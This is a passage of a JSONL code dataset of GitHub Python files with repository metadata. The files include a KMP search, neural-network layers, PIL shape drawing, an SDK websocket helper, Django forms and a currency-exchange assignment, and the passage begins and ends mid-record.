cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n key = cv2.waitKey(1)\n cap.release()\n\n return frame\n\n\ndef classify_image(clf, im):\n y = clf.predict(im)\n if y == 0:\n return 'none'\n elif y == 1:\n return 'play'\n elif y == 2:\n return 'pause'\n elif y == 3:\n return 'volume down'\n elif y == 4:\n return 'volume up'\n\n\nclf = pickle.load(open('model.json', 'rb'))\nim = capture_image()\nim = preprocessing_pipeline(im)\nlabel = classify_image(clf, im)\nprint(label)\n","repo_name":"SuryaThiru/smartVLC","sub_path":"cam_classify.py","file_name":"cam_classify.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"40648248056","text":"array = ['a','b','c','a','b','d']\n#next = 0 0 0 1 2 0\n\n#index = 0 1 2 3 4 5\nnext = [0] * len(array)\n#### initial positions of t and i\ni = 1\nt = 0\n\nwhile i < len(array):\n if array[i] == array[t]:\n next[i] = t + 1\n i += 1\n t += 1\n elif t>0: # trickiest part to remember: move t back to next[t-1]\n t = next[t-1]\n else:#t == 0\n next[i] = 0\n i += 1\n\nprint(next)\n\n##############\n'''\nThree cases in total:\n1. array[i] == array[t]: set next[i] = t + 1\n2. array[i] != array[t] and t > 0: fall back with t = next[t-1]\n3. t == 0: set next[i] = 0\n'''\ndef prefix_table(pattern):\n next = [0] * len(pattern)\n #### initial positions of t and i\n i = 1\n t = 0\n\n while i < len(pattern):\n if pattern[i] == pattern[t]:\n next[i] = t + 1\n i += 1\n t += 1\n elif t > 0: # trickiest part to remember: move t back to next[t-1]\n t = next[t - 1]\n else: # t == 0\n next[i] = 0\n i += 1\n return next\ndef move_prefix_table(prefix, n):\n for i in range(n-1, 0, -1):\n prefix[i] = prefix[i-1]\n prefix[0] = -1\n return prefix\n\ndef kmp_search(text, pattern):\n next = prefix_table(pattern)\n next = move_prefix_table(next, len(next))\n m = len(text)\n n = len(pattern)\n i = 0\n j = 0\n while i < m:\n if j == n-1 and text[i] == pattern[j]:\n print(\"Found at \",(i-j))\n break\n j = next[j]\n if text[i] == pattern[j]:\n i += 1\n j += 1\n else:\n j = next[j]\n if j == -1:\n i += 1\n j += 1\n\n\npattern = ['A','B','A','B','C','A','B','A','A']\ntext = ['A','B','A','B','A','B','C','A','B','A','A','B','A','B','A','B','A','B']\nkmp_search(text, pattern)","repo_name":"lczen/learnPython","sub_path":"未整理/kmp.py","file_name":"kmp.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"22803094712","text":"# coding: utf8\nfrom __future__ import print_function\n\nimport codecs\nimport json\nimport os\n\nimport pyprind\n\nfrom stst import utils\nfrom stst.data.sent_pair import SentPair\n\n\ndef load_data(train_file):\n \"\"\"\n Return list of dataset given train_file and gs_file\n Value: [(sa:str, sb:str, score:float)]\n \"\"\"\n with codecs.open(train_file, 'r', encoding='utf8') as f:\n data = []\n for idx, line in enumerate(f):\n line = line.strip().split('\\t')\n score = 0.\n if len(line) == 3:\n score = float(line[2])\n sa, sb = line[0], line[1]\n data.append((sa, sb, score))\n return data\n\n\ndef load_STS(train_file):\n with utils.create_read_file(train_file) as f:\n data = []\n for line in 
f:\n line = line.strip().split('\\t')\n score = float(line[4])\n sa, sb = line[5], line[6]\n data.append((sa, sb, score))\n return data\n\n\ndef load_parse_data(train_file, parser=None, flag=False):\n \"\"\"\n Load data after Parse, like POS, NER, etc.\n Value: [ SentPair:class, ... ]\n Parameter:\n flag: False(Default), Load from file (resources....)\n True, Parse and Write to file, and then load from file\n \"\"\"\n ''' Pre-Define Write File '''\n\n # parse_train_file = config.PARSE_DIR + '/' + \\\n # utils.FileManager.get_file(train_file)\n\n parse_train_file = train_file.replace('./data', './generate/parse')\n\n if flag or not os.path.isfile(parse_train_file):\n\n print(train_file)\n if parser is None:\n raise RuntimeError(\"parser should be init by ``nlp = stst.StanfordNLP('http://localhost:9000')``\")\n\n ''' Parse Data '''\n data = load_STS(train_file)\n\n print('*' * 50)\n print(\"Parse Data, train_file=%s, n_train=%d\\n\" % (train_file, len(data)))\n\n parse_data = []\n process_bar = pyprind.ProgPercent(len(data))\n for (sa, sb, score) in data:\n process_bar.update()\n parse_sa = parser.parse(sa)\n parse_sb = parser.parse(sb)\n parse_data.append((parse_sa, parse_sb, score))\n\n ''' Write Data to File '''\n with utils.create_write_file(parse_train_file) as f_parse:\n for parse_instance in parse_data:\n line = json.dumps(parse_instance)\n print(line, file=f_parse)\n\n ''' Load Data from File '''\n print('*' * 50)\n parse_data = []\n with utils.create_read_file(parse_train_file) as f:\n for line in f:\n parse_json = json.loads(line)\n sentpair_instance = SentPair(parse_json)\n parse_data.append(sentpair_instance)\n\n print(\"Load Data, train_file=%s, n_train=%d\\n\" % (train_file, len(parse_data)))\n return parse_data\n\n\ndef load_sentences(file_list, type='lemma'):\n \"\"\"\n sentence_dict['file'][idx]['sa'] = idx\n sentence_dict['file'][idx]['sb'] = idx+1\n \"\"\"\n sentence_tags = []\n sentences = []\n for file in file_list:\n # file is path\n file_name = file.split('/')[-1]\n parse_data = load_parse_data(file, None)\n for idx, train_instance in enumerate(parse_data):\n if type == 'lemma':\n sa, sb = train_instance.get_word(type='lemma', stopwords=False, lower=True)\n elif type == 'word' :\n sa, sb = train_instance.get_word(type='word')\n sa_tag = \"%s_%d_sa\" % (file_name, idx)\n sb_tag = \"%s_%d_sb\" % (file_name, idx)\n\n sentences.append(sa)\n sentence_tags.append(sa_tag)\n\n sentences.append(sb)\n sentence_tags.append(sb_tag)\n\n return sentences, sentence_tags","repo_name":"rgtjf/Semantic-Texual-Similarity-Toolkits","sub_path":"stst/data/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"91"} +{"seq_id":"17556650608","text":"import autodiff as ad\r\nimport numpy as np\r\nimport Xatolik \r\nimport Sozlovchi\r\nfrom tqdm import tqdm\r\n\r\nnp.random.seed(345)\r\n\r\nclass Layer:\r\n def __init__(self):\r\n pass\r\n\r\nclass Dense(Layer):\r\n def __init__(self, units):\r\n self.units = units\r\n self.w = None\r\n self.b = None\r\n\r\n #Forward propagation for 1 hidden layer\r\n def __call__(self, x): \r\n if self.w is None:\r\n self.w = ad.Tensor(np.random.uniform(size=(x.shape[-1], self.units), low=-1/np.sqrt(x.shape[-1]), high=1/np.sqrt(x.shape[-1])))\r\n self.b = ad.Tensor(np.zeros((1, self.units)))\r\n return x @ self.w + self.b\r\n\r\n #Gradient Descent\r\n def update(self, optim): \r\n self.w.value -= optim.delta(self.w)\r\n self.b.value -= 
optim.delta(self.b)\r\n\r\n self.w.grads = []\r\n self.w.dependencies = []\r\n self.b.grads = []\r\n self.b.dependencies = []\r\n\r\nclass Sigmoid:\r\n def __call__(self, x):\r\n return np.e**x /(1 + np.e**x)\r\n\r\nclass Softmax:\r\n def __call__(self, x):\r\n s = np.array(x).reshape(-1,1)\r\n return ad.Tensor(np.diagflat(s) - np.dot(s, s.T))\r\n \r\nclass Relu:\r\n def __call__(self, x):\r\n self.output = np.maximum(0, x)\r\n return self.output\r\n \r\nclass Model:\r\n def __init__(self, layers):\r\n self.layers = layers\r\n\r\n #Forward propagation\r\n def __call__(self, x): \r\n output = x\r\n\r\n for layer in self.layers:\r\n output = layer(output)\r\n\r\n return output\r\n\r\n def train(self, x, y, epochs=10, loss = Xatolik.MSE, optimizer=Sozlovchi.SGD(lr=0.1), batch_size=1):\r\n for epoch in range(epochs):\r\n LOSS = 0\r\n print (f\"EPOCH\", epoch + 1)\r\n for batch in tqdm(range(0, len(x), batch_size)):\r\n output = self(x[batch:batch+batch_size])\r\n l = loss(output, y[batch:batch+batch_size])\r\n optimizer(self, l)\r\n LOSS += l\r\n \r\n print (\"LOSS\", LOSS.value)\r\n print (\" \")\r\n","repo_name":"MisterFoziljon/Neyron-tarmoq-autodiff-bilan","sub_path":"Qatlam.py","file_name":"Qatlam.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"9292136705","text":"import numpy as np\nfrom PIL import Image, ImageDraw\nimport typing\n\nfrom .helpers import image_to_numpy, numpy_to_image, get_line_boundingbox, calculate_polygon_coords\nfrom .definitions import ElementType\n\ndef draw_polygon(image: np.ndarray, params:tuple, polygon_count:int) -> tuple:\n height, width, _ = image.shape\n\n color = params[4]\n overlay = Image.new(\"RGBA\", (width, height), color[:3] + (0,))\n draw = ImageDraw.Draw(overlay)\n\n coords = calculate_polygon_coords(params[0], params[1], params[2], params[3], polygon_count)\n\n x_coords = []\n y_coords = []\n for idx in range(polygon_count * 2):\n if idx % 2 == 0:\n x_coords.append(coords[idx])\n else:\n y_coords.append(coords[idx])\n\n draw.polygon([(xc, yc) for xc, yc in zip(x_coords, y_coords)], fill=color)\n bbox = np.array([max(0, min(x_coords) - 1), max(0, min(y_coords) - 1), min(width, max(x_coords) + 1), min(height, max(y_coords) + 1)], dtype=int)\n return overlay, bbox\n\ndef draw_element(output_image:np.ndarray, params:tuple, element_type:ElementType) -> typing.Tuple[np.ndarray, np.ndarray]:\n height, width, _ = output_image.shape\n\n img = numpy_to_image(output_image)\n\n if element_type == ElementType.LINE:\n overlay = Image.new(\"RGBA\", img.size, params[5][:3] + (0,))\n draw = ImageDraw.Draw(overlay)\n end_point = (params[0] + np.cos(params[4]) * params[2], params[1] + np.sin(params[4]) * params[2])\n coords = [params[0], params[1], *end_point]\n draw.line(coords, params[5], params[3])\n bbox = get_line_boundingbox(np.array(coords, dtype=np.float64), params[3], width, height).astype(int)\n elif element_type == ElementType.CIRCLE:\n thickness = (params[2] - 1) / 2\n color = params[3]\n ellipse_params = (params[0] - thickness, params[1] - thickness, params[0] + thickness, params[1] + thickness)\n\n overlay = Image.new(\"RGBA\", img.size, color[:3] + (0,))\n draw = ImageDraw.Draw(overlay)\n\n draw.ellipse(ellipse_params, fill=color)\n bbox = np.array([max(0, ellipse_params[0] - 1), max(0, ellipse_params[1] - 1), min(width, ellipse_params[2] + 1), min(height, ellipse_params[3] + 1)], dtype=int)\n elif element_type == ElementType.TRIANGLE:\n overlay, 
bbox = draw_polygon(output_image, params, 3)\n elif element_type == ElementType.SQUARE:\n overlay, bbox = draw_polygon(output_image, params, 4)\n elif element_type == ElementType.PENTAGON:\n overlay, bbox = draw_polygon(output_image, params, 5)\n elif element_type == ElementType.HEXAGON:\n overlay, bbox = draw_polygon(output_image, params, 6)\n elif element_type == ElementType.OCTAGON:\n overlay, bbox = draw_polygon(output_image, params, 8)\n else:\n raise Exception(\"Invalid element type for draw\")\n\n img.alpha_composite(overlay)\n\n return image_to_numpy(img), bbox\n","repo_name":"Matesxs/elementarise","sub_path":"elementarise/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"6470453215","text":"# small string = s\n# bing string = b\n# find permuations of s inside b.\n\n\ndef toString(List):\n return ''.join(List)\n\n\ndef permute(listofstring, start, end):\n\n\n\n\n if start==end:\n\n\n print (toString(listofstring))\n\n print (\"______________________\")\n\n else:\n\n\n #print (\"start: \" + str(start))\n\n for i in range(start,end+1):\n\n # print (\"start\")\n #print(listofstring)\n\n print (\"i:\" + str(i) + \" \" + \"start: \" + str(start) + \" \" + \"end: \" + str(end))\n\n temp = listofstring[start] # first char\n listofstring[start] = listofstring[i] \n #print (listofstring[start])\n listofstring[i] = temp\n # print (listofstring[i])\n \n\n\n #print (\"after\")\n # print(listofstring)\n\n #a[l], a[i] = a[i], a[l]\n\n permute(listofstring, start+1, end)\n\n print(\"Out\")\n\n print (\"i:\" + str(i) + \" \" + \"start: \" + str(start) + \" \" + \"end: \" + str(end))\n\n #print(\"Start: \" + str(start))\n\n temp = listofstring[start]\n listofstring[start] = listofstring[i]\n listofstring[i] = temp\n\n #print (\"temp: \" + str(temp))\n\n\n #a[l], a[i] = a[i], a[l] # backtrack\n\ndef findString(s, b):\n\n lists = list(s)\n listb = list(b)\n\n print (lists)\n print (listb)\n\n for letterb in b:\n\n for lettera in s:\n\n pass\n\n\n\ndef main(a, l, r):\n\n permute(a, l, r)\n\n\n #findString(s, b)\n\n\nif __name__ == '__main__':\n\n string = \"abc\"\n listofstring = list(string)\n end = len(string)\n \n permute(listofstring, 0, end-1)","repo_name":"WilliamMarti/CCI","sub_path":"strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"34881934629","text":"import logging\n\n__author__ = \"CloudGenix Developer Support \"\n__email__ = \"developers@cloudgenix.com\"\n__copyright__ = \"Copyright (c) 2017-2023, 2019 CloudGenix, Inc\"\n__license__ = \"\"\"\n MIT License\n\n Copyright (c) 2017-2023 CloudGenix, Inc\n\n Permission is hereby granted, free of charge, to any person obtaining a copy\n of this software and associated documentation files (the \"Software\"), to deal\n in the Software without restriction, including without limitation the rights\n to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n copies of the Software, and to permit persons to whom the Software is\n furnished to do so, subject to the following conditions:\n\n The above copyright notice and this permission notice shall be included in all\n copies or substantial portions of the Software.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 
MERCHANTABILITY,\n FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n SOFTWARE.\n\"\"\"\n\n# Set logging to function name\napi_logger = logging.getLogger(__name__)\n\"\"\"`logging.getlogger` object to enable debug printing via `cloudgenix.API.set_debug`\"\"\"\n\n\nclass WebSockets(object):\n \"\"\"\n CloudGenix Python SDK - WebSocket Functions\n\n Object to handle WebSocket operations.\n \"\"\"\n\n # placeholder for parent class namespace\n _parent_class = None\n\n def toolkit_session(self, element_id, tenant_id=None, api_version=\"v2.0\", cols=207, rows=53, **kwargs):\n \"\"\"\n Open a Toolkit Session WebSocket\n\n **Parameters:**:\n\n - **element_id**: Element ID\n - **tenant_id**: Tenant ID\n - **api_version**: API version to use (default v2.0)\n - **cols**: Optional: Integer, Number of columns for terminal (default 207)\n - **rows**: Optional: Integer, Number of rows for terminal (default 53)\n - ****kwargs**: Optional: Additional Keyword Arguments to pass to `websockets.client.Connect()`\n\n **Returns:** `websockets.client.Connect` object.\n \"\"\"\n\n if tenant_id is None and self._parent_class.tenant_id:\n # Pull tenant_id from parent namespace cache.\n tenant_id = self._parent_class.tenant_id\n elif not tenant_id:\n # No value for tenant_id.\n raise TypeError(\"tenant_id is required but not set or cached.\")\n # set controller, converting protocol to wss\n wss_ctlr = self._parent_class.controller.replace('https://', 'wss://', 1)\n\n url = str(wss_ctlr) + \"/{}/api/tenants/{}/elements/{}/ws/toolkitsessions?cols={}&rows={}\" \\\n \"\".format(api_version, tenant_id, element_id, cols, rows)\n\n api_logger.debug(\"URL = %s\", url)\n return self._parent_class.websocket_call(url, **kwargs)\n\n def default(self, tenant_id=None, api_version=\"v2.0\", **kwargs):\n \"\"\"\n Open the default Tenant WebSocket for use in multiple functions.\n\n **Parameters:**:\n\n - **tenant_id**: Tenant ID\n - **api_version**: API version to use (default v2.0)\n - ****kwargs**: Optional: Additional Keyword Arguments to pass to `websockets.client.Connect()`\n\n **Returns:** `websockets.client.Connect` object.\n \"\"\"\n\n if tenant_id is None and self._parent_class.tenant_id:\n # Pull tenant_id from parent namespace cache.\n tenant_id = self._parent_class.tenant_id\n elif not tenant_id:\n # No value for tenant_id.\n raise TypeError(\"tenant_id is required but not set or cached.\")\n # set controller, converting protocol to wss\n wss_ctlr = self._parent_class.controller.replace('https://', 'wss://', 1)\n\n url = str(wss_ctlr) + \"/{}/api/tenants/{}/ws\" \\\n \"\".format(api_version, tenant_id)\n\n api_logger.debug(\"URL = %s\", url)\n return self._parent_class.websocket_call(url, **kwargs)\n","repo_name":"CloudGenix/sdk-python","sub_path":"cloudgenix/ws_api.py","file_name":"ws_api.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"91"} +{"seq_id":"36103237503","text":"from django import forms\nfrom equipamentos.models import Irradiacao, Modulo_fotovoltaico,Inversor_fotovoltaico\nfrom temperatura.models import Temperatura\nfrom django.shortcuts import get_object_or_404\n\nclass CalculadoraForm(forms.Form):\n\n CDD = (\n (30, 'Monofásico'),\n (50, 'Bifásico'),\n (100, 
'Trifásico')\n )\n\n # custo_de_disponibilidade = forms.IntegerField(label='Custo de disponibilidade')\n custo_de_disponibilidade = forms.ChoiceField(label='Custo de disponibilidade', choices=CDD)\n consumo_medio = forms.DecimalField(label='Consumo médio', decimal_places=2)\n irradiacao = forms.ModelChoiceField(queryset=Irradiacao.objects.all(), initial='0')\n modulo = forms.ModelChoiceField(queryset=Modulo_fotovoltaico.objects.all(), initial='0')\n #inversor = forms.ModelChoiceField(queryset=Inversor_fotovoltaico.objects.all(), initial='0')\n\nclass CalculadoraCompletaForm(forms.Form):\n CDD = (\n (30, 'Monofásico'),\n (50, 'Bifásico'),\n (100, 'Trifásico')\n )\n\n TEMP = (\n (22, 'Estrutura totalmente elevada (solo)'),\n (28, 'Laje ou telhado (com espaço/inclinação)'),\n (29, 'Sobre o telhado (com ventilação)'),\n (32, 'integrado (sem ventilação)')\n )\n\n custo_de_disponibilidade = forms.ChoiceField(label='Custo de disponibilidade', choices=CDD, initial='0')\n consumo_medio = forms.FloatField(label='Consumo médio')\n irradiacao = forms.ModelChoiceField(queryset=Irradiacao.objects.all(), initial='0')\n modulo = forms.ModelChoiceField(queryset=Modulo_fotovoltaico.objects.all(), initial='0')\n inversor = forms.ModelChoiceField(queryset=Inversor_fotovoltaico.objects.all(), initial='0')\n temperatura_ambiente = forms.ChoiceField(label='Temperatura no local de instalação', choices=TEMP)\n temperatura_media = forms.ModelChoiceField(queryset=Temperatura.objects.all(), initial='0')\n perda_sombreamento = forms.FloatField(label='Perdas por sombreamento', initial=2)\n perda_sujeira = forms.FloatField(label='Perdas por sujeira', initial=0)\n perda_tolerancia_potencia = forms.FloatField(label='Perdas por Tolerância de potência', initial=0)\n perda_mismatching = forms.FloatField(label='Perdas por mismatching', initial=1)\n perda_cabeamento_cc = forms.FloatField(label='Perdas por cabeamento CC', initial=1)\n perda_spmp = forms.FloatField(label='Perdas por MPPT', initial=0)\n perda_conversao_ccca = forms.FloatField(label='Perdas por conversão CC CA', initial=2.40)\n perda_cabeamento_ca = forms.FloatField(label='Perdas por cabeamento CA', initial=1)\n tarifa_energia = forms.FloatField(label='Tarifa de energia elétrica', initial='0.92')\n \n\n\n ","repo_name":"matheusbaars/gerenciamento-solar","sub_path":"calculadora/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"16718274362","text":"import argparse\n\nfrom pathlib import Path\nfrom PIL import Image\nfrom resizeimage import resizeimage\n\nDATASETS = {\n \"montgomery\": \"Montgomery/MontgomerySet/CXR_png/\",\n \"china\": \"ChinaSet_AllFiles/ChinaSet_AllFiles/CXR_png/\",\n}\nFINAL_IMAGE_SIZE = [512, 512]\n\n\ndef process_dataset(input_path, output_path):\n if not output_path.exists():\n output_path.mkdir(parents=True)\n\n for image in input_path.glob(\"*.png\"):\n with image.open(\"rb\") as fd_img:\n img = Image.open(fd_img)\n img = resizeimage.resize_cover(img, FINAL_IMAGE_SIZE)\n img.save(output_path.joinpath(image.name), img.format)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Crops and resizes images\")\n parser.add_argument(\n \"-d\",\n \"--dataset-dir\",\n dest=\"dataset_dir\",\n required=True,\n help=\"Path to the kaggle dataset directory\",\n )\n parser.add_argument(\n \"-o\",\n \"--output-dir\",\n dest=\"output_dir\",\n help=\"Destination for the cropped images\",\n 
default=\"output\",\n )\n args = parser.parse_args()\n\n dataset_path = Path(args.dataset_dir)\n output_path = Path(args.output_dir)\n\n for dataset in DATASETS:\n process_dataset(dataset_path / DATASETS[dataset], output_path / dataset)\n","repo_name":"dbanck/tb-image-prep","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"} +{"seq_id":"6798404407","text":"# Name : Rupanshoo Saxena\n# Roll No : 2019096\n# Group : 6 (SECTION A)\n\nimport urllib.request #for Task 1.1\nimport datetime #for Task 4\n\n\ndef getLatestRates(): #Task 1.1: uses the above imported library to get latest json string\n\t\"\"\" Returns: a JSON string that is a response to a latest rates query.\n\n\tThe Json string will have the attributes: rates, base and date (yyyy-mm-dd).\n\t\"\"\"\n\turl = urllib.request.urlopen(\"http://api.exchangeratesapi.io/latest\")\n\tdata = url.read() #reads json string\n\treturn data\n\n\n\ndef getSpecificRates(date): #additional function made to get json string of the specified date\n\turlSpec = urllib.request.urlopen(\"http://api.exchangeratesapi.io/\" + str(date))\n\tdataSpec = str(urlSpec.read()) #reads json string and stores it in the form of normal string\n\treturn dataSpec #returns normal string\n\n\n\n\ndef getRangeOfRates(sDate,eDate): #additional function made to get json strings between given time period(includes data of start name and doesnot take data of end date)\n\turl3 = urllib.request.urlopen(\"https://api.exchangeratesapi.io/history?start_at=\"+str(sDate)+\"&end_at=\"+str(eDate))\n\tdata3 = str(url3.read())\n\treturn data3 #returns string\n\n\n\ndef changeBase(amount, currency, desiredCurrency, date): #Task 1\n\t\"\"\" Outputs: a float value f.\n\t\"\"\"\n\n\tt1 = getSpecificRates(date) #stores json string of that specific date in the form of a normal string\n\tcur1 = t1.find(currency) #stores index of current currency from the string\n\tcur2 = t1.find(desiredCurrency) #stores index of desired currency from the string\n\n\tif(cur1 == -1 or cur2 == -1): #when either of the currencies entered is not present in the string - show error\n\t\treturn \"Wrong currency entered\"\n\telse:\n\n\n\t\tif currency == \"EUR\": #when currency is Euro\n\t\t\tif desiredCurrency == \"EUR\": #when desired currency is also Euro\n\t\t\t\treturn amount\n\n\t\t\ttemp4 = t1[cur2:] #slices string from the index of the desired currency till the end\n\t\t\ttemp5 = temp4.find(\",\")\n\t\t\ttemp6 = temp4.find(\":\")\n\t\t\tcur2Val = float(temp4[temp6+1:temp5]) #slices string such that it stores the value of the desired currency which is present between the : and ,\n\t\t\treturn amount * cur2Val\n\n\t\ttemp1 = t1[cur1:] #slices string from the index of the current currency till the end\n\t\ttemp2 = temp1.find(\",\")\n\t\ttemp3 = temp1.find(\":\")\n\t\tcur1Val = float(temp1[temp3+1:temp2]) #slices string such that it stores the value of the current currency which is present between the : and ,\n\t\t \n\t\tif desiredCurrency == \"EUR\": #when desired currency is EURO\n\t\t\treturn amount / cur1Val\n\n\t\ttemp4 = t1[cur2:] #slices string from the index of the desired currency till the end\n\t\ttemp5 = temp4.find(\",\")\n\t\ttemp6 = temp4.find(\":\")\n\t\tcur2Val = float(temp4[temp6+1:temp5]) #slices string such that it stores the value of the desired currency which is present between the : and ,\n\t\t#print(cur2Val)\n\treturn ((float(cur2Val)/float(cur1Val))*float(amount)) #logic 
for converting given value from current to desired currency\n\n#print(changeBase(250,\"EUR\",\"CNY\",\"2017-06-25\"))\n#json = getLatestRates()\n\ndef valuesList(t2): #additional function to put all the values of the currency in order of occurence in the json string in a list\n \tt2 = str(t2) #json string converted to str\n \tasc = [] #empty list created \n \ttemp7 = t2.find(\":\") \n \ttemp8 = t2.find(\"}\")\n \tt2 = t2[temp7+1:temp8+1] #slices string such that the initial part before : and end part after } is removed\n \ttemp12 = t2.find(\"MYR\") \n \tfor i in range(len(t2[0:temp12])): \n \t\ttemp9 = t2.find(\":\")\n \t\ttemp10 = t2.find(\",\")\n \t\tasc.append(float(t2[temp9 + 1:temp10]))\n \t\tt2 = t2[temp10+1:]\n \t\tif(i==31):\n \t\t\tbreak\n\n \t\t\n \t\n \treturn asc\n\nb = getLatestRates() \nc = valuesList(b)\n\n\n\n\ndef printAscending(json): #Task 2\n\t\"\"\" Output: the sorted order of the Rates \n\t\tYou don't have to return anything.\n\t\n\tParameter:\n\tjson: a json string to parse\n\t\"\"\"\n\tjson = valuesList(json)\n\tascTemp = []\n\tfor i in range(len(json)): #finds the min value in the unsorted list, appends that value in a temporary list and removes it from the original list\n\t\ttemp11 = min(json) \n\t\tascTemp.append(temp11)\n\t\tjson.remove(temp11)\n\tjson = ascTemp #temporary list is stored back into the original list\n\t#print(json)\n\n\n\tfor i in range(len(json)): #loop for getting output in given form with display of the names of currencies\n\t\tasc2 = str(getLatestRates())\n\t\ttemp13 = asc2.find(str(json[i])) \n\t\ttemp14 = asc2[temp13 - 3:temp13 - 6:-1]\n\t\tprint(\"1 Euro = \" + str(json[i]) + ' ' + temp14[::-1])\n\t\tasc2 = asc2[:temp13 - 2] + asc2[temp13:]\n\t\t\n\n\n#printAscending(b)\n\n\n\ndef extremeFridays(startDate, endDate, currency): #Task 3 : ASSUMPTION- end date's data will also be included\n\t\"\"\" Output: on which friday was currency the strongest and on which was it the weakest.\n\t\tYou don't have to return anything.\n\t\t\n\tParameters: \n\tstardDate and endDate: strings of the form yyyy-mm-dd\n\tcurrency: a string representing the currency those extremes you have to determine\n\t\"\"\"\n\tt3 = getRangeOfRates(startDate,endDate)\n\ttdelta1 = datetime.timedelta(days=1) #timedelta prints date of the day according to the count given in the brackets i.e. 
if days = 7 then it will give date of the day after 7 days\n\ttdelta2 = datetime.timedelta(days=7) #count of days = 7\n\tfriday=[] #list to store all dates which occur on a friday in the given range\n\tdate1 = datetime.datetime.strptime(startDate,'%Y-%m-%d').date() #to convert the date from str to datetime\n\tdate2 = datetime.datetime.strptime(endDate,'%Y-%m-%d').date()\n\twhile(date1.weekday()!=4):\n\t\tdate1 = date1 + tdelta1 #for finding the first friday\n\tfriday.append(str(date1))\n\n\twhile(date1 < date2): #adding 7 to get the next friday\n\t\tdate1 = date1 + tdelta2\n\t\tfriday.append(str(date1)) \n\n\tif(date2.weekday()!=4): #condition for when the end date is not a friday\n\t\tdel friday[-1]\n\t#print(friday)\n\n\tDict = {} #dictionary named Dict\n\n\tfor i in range(len(friday)): #store the values of the given currency in the dictionary with the dates as keys\n\t\ttemp15 = t3.find(friday[i])\n\t\ttemp16 = t3[temp15:]\n\t\ttemp17 = temp16[:temp16.find('}')]\n\t\ttemp18 = temp17[temp17.find(currency):]\n\t\ttemp19 = temp18[5:temp18.find(',')]\n\t\tif (temp19 == ''):\n\t\t\tcontinue\n\t\tDict[friday[i]] = temp19 \n\n\t#print(Dict)\n\tmax_value = max(Dict.values()) #gives the maximum value of the currency\n\tmin_value = min(Dict.values()) #gives the minimum value of the currency\n\n\tprint(currency + \" was weakest on \" + max(Dict, key=Dict.get) + \". 1 Euro was equal to \" + max_value + \" \" + currency) #the higher the value of the currency, the weaker the currency\n\tprint(currency + \" was strongest on \" + min(Dict, key=lambda k:Dict[k]) + \". 1 Euro was equal to \" + min_value + \" \" + currency) #the lower the value of the currency, the stronger the currency\n\n\n#extremeFridays(\"2019-02-16\",\"2019-06-28\",\"CAD\")\n\n\n\n\ndef findMissingDates(startDate, endDate): #Task 4\n\t\"\"\" Output: the dates that are not present when you do a json query from startDate to endDate\n\t\tYou don't have to return anything.\n\n\t\tParameters: startDate and endDate: strings of the form yyyy-mm-dd\n\t\"\"\"\n\tt4 = getRangeOfRates(startDate,endDate)\n\tallDates = [] #list to store all the dates from start date to end date\n\tdate3 = datetime.datetime.strptime(startDate,'%Y-%m-%d').date() \n\tdate4 = datetime.datetime.strptime(endDate,'%Y-%m-%d').date() \n\ttdelta = datetime.timedelta(days=1)\n\n\twhile(date3 <= date4): #including the end date too\n\t\tallDates.append(str(date3))\n\t\tdate3 = date3 + tdelta\n\n\tmissing = [] #list to store all the missing dates\n\n\tfor i in range(len(allDates)):\n\t\ttemp19 = t4.find(allDates[i])\n\n\t\tif(temp19 == -1): #if the date was not present in the json response\n\t\t\tmissing.append(allDates[i])\n\n\tprint(\"The following dates were not present:\\n\")\n\tfor i in range(len(missing)):\n\t\tprint(missing[i]+'\\n')\n\n#findMissingDates(\"2018-01-01\",\"2018-09-01\")\n","repo_name":"rupanshoo/access-data-currency-exchange-rates","sub_path":"a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":7823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"38682667747","text":"# Develop a program that reads the name, age and sex of 4 people. At the end, the program must show:\n# the group's average age / the name of the oldest man / how many women are under 20 years old.\n\nsomaidade = 0\ntotalidade = 0\nmaioridadehomem = 0\nnomevelho = ''\nmulheres20 = 0\nfor pessoa in range(1,5):\n    print('------ Person {} ------'.format(pessoa))\n    nome = str(input('Name: '))\n    idade = int(input('Age: '))\n    sexo = str(input('[M/F]: '))\n\n    somaidade = somaidade + idade\n    if pessoa == 1 and sexo == 'M':\n        maioridadehomem = idade\n        nomevelho = nome\n    if idade > maioridadehomem and sexo == 'M':\n        maioridadehomem = idade\n        nomevelho = nome\n\n    if sexo =='F' and idade < 20:\n        mulheres20 